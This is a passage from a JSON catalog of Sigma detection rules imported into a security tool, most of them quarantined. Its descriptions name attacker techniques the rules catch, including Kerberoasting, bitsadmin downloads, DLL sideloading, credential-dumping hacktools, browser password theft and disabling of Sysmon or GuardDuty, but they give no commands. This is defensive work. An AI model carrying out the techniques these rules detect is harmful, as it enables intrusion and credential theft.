"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_susp_ldap_dataexchange.yml" } }, { "id": "sigmahq-sigma-d042284c-a296-4988-9be5-f424fadcc28c", "type": "detection", "name": "Suspicious Execution of InstallUtil Without Log", "description": "Uses the .NET InstallUtil.exe application in order to execute image without log", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-execution-of-installutil-without-log.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d042284c-a296-4988-9be5-f424fadcc28c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_instalutil_no_log_execution.yml" } }, { "id": "sigmahq-sigma-d047726b-c71c-4048-a99b-2e2f50dc107d", "type": "detection", "name": "Kavremover Dropped Binary LOLBIN Usage", "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kavremover-dropped-binary-lolbin-usage.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d047726b-c71c-4048-a99b-2e2f50dc107d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_kavremover_uncommon_execution.yml" } }, { "id": "sigmahq-sigma-d04ae2b8-ad54-4de0-bd87-4bc1da66aa59", "type": "detection", "name": "Kerberoasting Activity - Initial Query", "description": "This rule will collect the data needed to start looking into possible kerberoasting activity.\nFurther analysis or computation within the query is needed focusing on requests from one specific host/IP towards multiple service names within a time period of 5 seconds.\nYou can then set a threshold for the number of requests and time between the requests to turn this into an alert.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1558.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/kerberoasting-activity-initial-query.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d04ae2b8-ad54-4de0-bd87-4bc1da66aa59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_kerberoasting_activity.yml" } }, { "id": "sigmahq-sigma-d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "type": "detection", "name": "File Download Via Bitsadmin", "description": "Detects usage of bitsadmin downloading a file", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197", "T1036.003", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-via-bitsadmin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d059842b-6b9d-4ed1-b5c3-5b89143c6ede", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_bitsadmin_download.yml" } }, { "id": "sigmahq-sigma-d06be4b9-8045-428b-a567-740a26d9db25", "type": "detection", "name": "Verclsid.exe Runs COM Object", "description": "Detects when verclsid.exe is used to run COM object via GUID", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/verclsid-exe-runs-com-object.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d06be4b9-8045-428b-a567-740a26d9db25", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_verclsid_runs_com.yml" } }, { "id": "sigmahq-sigma-d08722cd-3d09-449a-80b4-83ea2d9d4616", "type": "detection", "name": "Hidden Files and Directories", "description": "Detects adversary creating hidden file or directory, by detecting directories or files with . as the first character", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1564.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hidden-files-and-directories.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d08722cd-3d09-449a-80b4-83ea2d9d4616", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_hidden_files_directories.yml" } }, { "id": "sigmahq-sigma-d08a2711-ee8b-4323-bdec-b7d85e892b31", "type": "detection", "name": "PUA - CsExec Execution", "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1587.001", "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-csexec-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_csexec.yml" } }, { "id": "sigmahq-sigma-d08dd86f-681e-4a00-a92c-1db218754417", "type": "detection", "name": "MSSQL XPCmdshell Option Change", "description": "Detects when the MSSQL \"xp_cmdshell\" stored procedure setting is changed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mssql-xpcmdshell-option-change.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d08dd86f-681e-4a00-a92c-1db218754417", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/application/mssqlserver/win_mssql_xp_cmdshell_change.yml" } }, { "id": "sigmahq-sigma-d0d2f720-d14f-448d-8242-51ff396a334e", "type": "detection", "name": "HackTool - Generic Process Access", "description": "Detects process access requests from hacktool processes based on their default image name", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-generic-process-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d0d2f720-d14f-448d-8242-51ff396a334e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_hktl_generic_access.yml" } }, { "id": "sigmahq-sigma-d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "type": "detection", "name": "PUA - WebBrowserPassView Execution", "description": "Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-webbrowserpassview-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d0dae994-26c6-4d2d-83b5-b3c8b79ae513", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_webbrowserpassview.yml" } }, { "id": "sigmahq-sigma-d102b8f5-61dc-4e68-bd83-9a3187c67377", "type": "detection", "name": "Renamed VsCode Code Tunnel Execution - File Indicator", "description": "Detects the creation of a file with the name \"code_tunnel.json\" which indicate execution and usage of VsCode tunneling utility by an \"Image\" or \"Process\" other than VsCode.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/renamed-vscode-code-tunnel-execution-file-indicator.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d102b8f5-61dc-4e68-bd83-9a3187c67377", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_vscode_tunnel_renamed_execution.yml" } }, { "id": "sigmahq-sigma-d13c43f0-f66b-4279-8b2c-5912077c1780", "type": "detection", "name": "CLR DLL Loaded Via Office Applications", "description": "Detects CLR DLL being loaded by an Office Product", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/clr-dll-loaded-via-office-applications.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d13c43f0-f66b-4279-8b2c-5912077c1780", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_office_dotnet_clr_dll_load.yml" } }, { "id": "sigmahq-sigma-d20ee2f4-822c-4827-9e15-41500b1fff10", "type": "detection", "name": "Potential Amazon SSM Agent Hijacking", "description": "Detects potential Amazon SSM agent hijack attempts as outlined in the Mitiga research report.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-amazon-ssm-agent-hijacking.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d20ee2f4-822c-4827-9e15-41500b1fff10", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml" } }, { "id": "sigmahq-sigma-d2125259-ddea-4c1c-9c22-977eb5b29cf0", "type": "detection", "name": "New Root Certificate Installed Via Certutil.EXE", "description": "Detects execution of \"certutil\" with the \"addstore\" flag in order to install a new certificate on the system.\nAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-root-certificate-installed-via-certutil-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2125259-ddea-4c1c-9c22-977eb5b29cf0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certutil_certificate_installation.yml" } }, { "id": "sigmahq-sigma-d21374ff-f574-44a7-9998-4a8c8bf33d7d", "type": "detection", "name": "WmiPrvSE Spawned A Process", "description": "Detects WmiPrvSE spawning a process", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "endpoint", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/wmiprvse-spawned-a-process.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" } }, { "id": "sigmahq-sigma-d223b46b-5621-4037-88fe-fda32eead684", "type": "detection", "name": "New Root or CA or AuthRoot Certificate to Store", "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1490" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/new-root-or-ca-or-authroot-certificate-to-store.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d223b46b-5621-4037-88fe-fda32eead684", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml" } }, { "id": "sigmahq-sigma-d22b4df4-5a67-4859-a578-8c9a0b5af9df", "type": "detection", "name": "Azure Network Security Configuration Modified or Deleted", "description": "Identifies when a network security configuration is modified or deleted.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-network-security-configuration-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d22b4df4-5a67-4859-a578-8c9a0b5af9df", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_network_security_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-d22df9cd-2aee-4089-93c7-9dc4eae77f2c", "type": "detection", "name": "ISATAP Router Address Was Set", "description": "Detects the configuration of a new ISATAP router on a Windows host. While ISATAP is a legitimate Microsoft technology for IPv6 transition, unexpected or unauthorized ISATAP router configurations could indicate a potential IPv6 DNS Takeover attack using tools like mitm6.\nIn such attacks, adversaries advertise themselves as DHCPv6 servers and set malicious ISATAP routers to intercept traffic.\nThis detection should be correlated with network baselines and known legitimate ISATAP deployments in your environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1557", "T1565.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/isatap-router-address-was-set.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d22df9cd-2aee-4089-93c7-9dc4eae77f2c", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/microsoft_windows_Iphlpsvc/win_system_isatap_router_address_set.yml" } }, { "id": "sigmahq-sigma-d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "type": "detection", "name": "XBAP Execution From Uncommon Locations Via PresentationHost.EXE", "description": "Detects the execution of \".xbap\" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious \".xbap\" files any bypass AWL", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/xbap-execution-from-uncommon-locations-via-presentationhost-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d22e2925-cfd8-463f-96f6-89cec9d9bc5f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml" } }, { "id": "sigmahq-sigma-d2451be2-b582-4e15-8701-4196ac180260", "type": "detection", "name": "Potential DLL Sideloading Of KeyScramblerIE.DLL Via KeyScrambler.EXE", "description": "Detects potential DLL side loading of \"KeyScramblerIE.dll\" by \"KeyScrambler.exe\".\nVarious threat actors and malware have been found side loading a masqueraded \"KeyScramblerIE.dll\" through \"KeyScrambler.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-keyscramblerie-dll-via-keyscrambler-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2451be2-b582-4e15-8701-4196ac180260", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_keyscrambler.yml" } }, { "id": "sigmahq-sigma-d2605a99-2218-4894-8fd3-2afb7946514d", "type": "detection", "name": "Potential Mfdetours.DLL Sideloading", "description": "Detects potential DLL sideloading of \"mfdetours.dll\". While using \"mftrace.exe\" it can be abused to attach to an arbitrary process and force load any DLL named \"mfdetours.dll\" from the current directory of execution.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-mfdetours-dll-sideloading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2605a99-2218-4894-8fd3-2afb7946514d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_mfdetours.yml" } }, { "id": "sigmahq-sigma-d2656e78-c069-4571-8220-9e0ab5913f19", "type": "detection", "name": "AWS GuardDuty Detector Deleted Or Updated", "description": "Detects successful deletion or disabling of an AWS GuardDuty detector, possibly by an attacker trying to avoid detection of its malicious activities.\nUpon deletion, GuardDuty stops monitoring the environment and all existing findings are lost.\nVerify with the user identity that this activity is legitimate.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685", "T1685.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-guardduty-detector-deleted-or-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2656e78-c069-4571-8220-9e0ab5913f19", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_cloudtrail_guardduty_detector_deleted_or_updated.yml" } }, { "id": "sigmahq-sigma-d26ce60c-2151-403c-9a42-49420d87b5e4", "type": "detection", "name": "HackTool Service Registration or Execution", "description": "Detects installation or execution of services", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-service-registration-or-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_hacktools.yml" } }, { "id": "sigmahq-sigma-d27ab432-2199-483f-a297-03633c05bae6", "type": "detection", "name": "OS Architecture Discovery Via Grep", "description": "Detects the use of grep to identify information about the operating system architecture. Often combined beforehand with the execution of \"uname\" or \"cat /proc/cpuinfo\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/os-architecture-discovery-via-grep.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d27ab432-2199-483f-a297-03633c05bae6", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_grep_os_arch_discovery.yml" } }, { "id": "sigmahq-sigma-d292e0af-9a18-420c-9525-ec0ac3936892", "type": "detection", "name": "Suspicious Java Children Processes", "description": "Detects java process spawning suspicious children", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-java-children-processes.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d292e0af-9a18-420c-9525-ec0ac3936892", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_java_children.yml" } }, { "id": "sigmahq-sigma-d29a20b2-be4b-4827-81f2-3d8a59eab5fc", "type": "detection", "name": "Sysinternals Tools AppX Versions Execution", "description": "Detects execution of Sysinternals tools via an AppX package.\nAttackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/sysinternals-tools-appx-versions-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml" } }, { "id": "sigmahq-sigma-d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", "type": "detection", "name": "HackTool - SysmonEnte Execution", "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-sysmonente-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_hktl_sysmonente.yml" } }, { "id": "sigmahq-sigma-d2b749ee-4225-417e-b20e-a8d2193cbb84", "type": "detection", "name": "PUA - AdvancedRun Execution", "description": "Detects the execution of AdvancedRun utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.003", "T1134.002", "T1059.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/pua-advancedrun-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2b749ee-4225-417e-b20e-a8d2193cbb84", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_pua_advancedrun.yml" } }, { "id": "sigmahq-sigma-d2d642d7-b393-43fe-bae4-e81ed5915c4b", "type": "detection", "name": "Scheduled Task/Job At", "description": "Detects the use of at/atd which are utilities that are used to schedule tasks.\nThey are often abused by adversaries to maintain persistence or to perform task scheduling for initial or recurring execution of malicious code", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "endpoint", "mitre_techniques": [ "T1053.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/scheduled-task-job-at.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2d642d7-b393-43fe-bae4-e81ed5915c4b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_at_command.yml" } }, { "id": "sigmahq-sigma-d2d901db-7a75-45a1-bc39-0cbf00812192", "type": "detection", "name": "Number Of Resource Creation Or Deployment Activities", "description": "Number of VM creations or deployment activities occur in Azure via the azureactivity log.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/number-of-resource-creation-or-deployment-activities.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "d2d901db-7a75-45a1-bc39-0cbf00812192", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_creating_number_of_resources_detection.yml" } }, { "id": "sigmahq-sigma-d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", "type": "detection", "name": "PowerShell Script With File Upload Capabilities", "description": "Detects PowerShell scripts leveraging the \"Invoke-WebRequest\" cmdlet to send data via either \"PUT\" or \"POST\" method.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", 